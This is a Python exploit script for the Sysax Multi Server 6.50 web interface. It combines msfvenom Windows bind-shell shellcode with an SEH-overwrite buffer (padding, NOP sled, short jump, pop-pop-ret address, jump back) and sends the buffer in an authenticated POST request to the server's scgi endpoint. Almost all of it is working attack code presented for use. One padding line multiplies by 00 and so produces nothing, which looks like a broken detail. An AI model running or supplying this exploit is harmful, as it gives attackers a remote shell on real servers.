Sysax multi server 6.50 better version

1. import httplib
2.  
3. target = 'webbackup'
4. port = 80
5. sid = '57e546cb7204b60f0111523409e49bdb16692ab5' #retrieved from browser URL after login
6. #example: http://hostname/scgi?sid=57e546cb7204b60f0111523409e49bdb16692ab5&pid=dltslctd_name1.htm
7.  
8. #msfvenom -p windows/shell_bind_tcp LPORT=4444 --platform windows -a x86 -f c -b "\x00\x0a"
9.  
10. shell=("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd7\xae"
11. "\x73\xe9\x83\xeb\xfc\xe2\xf4\x2b\x46\xf1\xe9\xd7\xae\x13\x60"
12. "\x32\x9f\xb3\x8d\x5c\xfe\x43\x62\x85\xa2\xf8\xbb\xc3\x25\x01"
13. "\xc1\xd8\x19\x39\xcf\xe6\x51\xdf\xd5\xb6\xd2\x71\xc5\xf7\x6f"
14. "\xbc\xe4\xd6\x69\x91\x1b\x85\xf9\xf8\xbb\xc7\x25\x39\xd5\x5c"
15. "\xe2\x62\x91\x34\xe6\x72\x38\x86\x25\x2a\xc9\xd6\x7d\xf8\xa0"
16. "\xcf\x4d\x49\xa0\x5c\x9a\xf8\xe8\x01\x9f\x8c\x45\x16\x61\x7e"
17. "\xe8\x10\x96\x93\x9c\x21\xad\x0e\x11\xec\xd3\x57\x9c\x33\xf6"
18. "\xf8\xb1\xf3\xaf\xa0\x8f\x5c\xa2\x38\x62\x8f\xb2\x72\x3a\x5c"
19. "\xaa\xf8\xe8\x07\x27\x37\xcd\xf3\xf5\x28\x88\x8e\xf4\x22\x16"
20. "\x37\xf1\x2c\xb3\x5c\xbc\x98\x64\x8a\xc6\x40\xdb\xd7\xae\x1b"
21. "\x9e\xa4\x9c\x2c\xbd\xbf\xe2\x04\xcf\xd0\x51\xa6\x51\x47\xaf"
22. "\x73\xe9\xfe\x6a\x27\xb9\xbf\x87\xf3\x82\xd7\x51\xa6\x83\xdf"
23. "\xf7\x23\x0b\x2a\xee\x23\xa9\x87\xc6\x99\xe6\x08\x4e\x8c\x3c"
24. "\x40\xc6\x71\xe9\xc6\xf2\xfa\x0f\xbd\xbe\x25\xbe\xbf\x6c\xa8"
25. "\xde\xb0\x51\xa6\xbe\xbf\x19\x9a\xd1\x28\x51\xa6\xbe\xbf\xda"
26. "\x9f\xd2\x36\x51\xa6\xbe\x40\xc6\x06\x87\x9a\xcf\x8c\x3c\xbf"
27. "\xcd\x1e\x8d\xd7\x27\x90\xbe\x80\xf9\x42\x1f\xbd\xbc\x2a\xbf"
28. "\x35\x53\x15\x2e\x93\x8a\x4f\xe8\xd6\x23\x37\xcd\xc7\x68\x73"
29. "\xad\x83\xfe\x25\xbf\x81\xe8\x25\xa7\x81\xf8\x20\xbf\xbf\xd7"
30. "\xbf\xd6\x51\x51\xa6\x60\x37\xe0\x25\xaf\x28\x9e\x1b\xe1\x50"
31. "\xb3\x13\x16\x02\x15\x83\x5c\x75\xf8\x1b\x4f\x42\x13\xee\x16"
32. "\x02\x92\x75\x95\xdd\x2e\x88\x09\xa2\xab\xc8\xae\xc4\xdc\x1c"
33. "\x83\xd7\xfd\x8c\x3c")
34.  
35. arg="folder_" #can also be changed to file_ if user has file delete permissions
36. pid="dltslctd_name1" #Can be changed, though padding will needed to be updated as well
37. junk1="A"*26401*00 #Initial pile of junk
38. noppad="\x95"*296 #Place to land from our long jump and before our shellcode
39. junkfill="\x90"*(768-len(shell)) #Fill in after our shellcode till nseh
40. nseh="\xeb\x06\x90\x90" #Short jump over SEH
41. seh="\xd7\x2a\x92\x5c" #pop esi # pop edi # ret RPCNS4.dll
42. jump="\xe9\x13\xfc\xff\xff" #jump back 1000 bytes for plenty of room for your shellcode
43. junk2="D"*9500 #Junk at the end
44.  
45.  
46. buff=(arg+junk1+noppad+shell+junkfill+nseh+seh+jump+junk2)
47.  
48.  
49. head = "Host: Wee! \r\n"
50. head += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\r\n"
51. head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
52. head += "Accept-Language: en-us,en;q=0.5\r\n"
53. head += "Accept-Encoding: gzip, deflate\r\n"
54. head += "Referer: http://gotcha/scgi?sid="+sid+"&pid="+pid+".htm\r\n"
55. head += "Proxy-Connection: keep-alive\r\n"
56. head += "Content-Type: multipart/form-data; boundary=---------------------------20908311357425\r\n"
57. head += "Content-Length: 1337\r\n"
58. head += "If-Modified-Since: *\r\n"
59. head += "\r\n"
60. head += "-----------------------------217830224120\r\n"
61. head += "\r\n"
62. head += "\r\n"
63. head += "\r\n"
64. head += buff
65.  
66. conn = httplib.HTTPConnection(target,port)
67. conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head)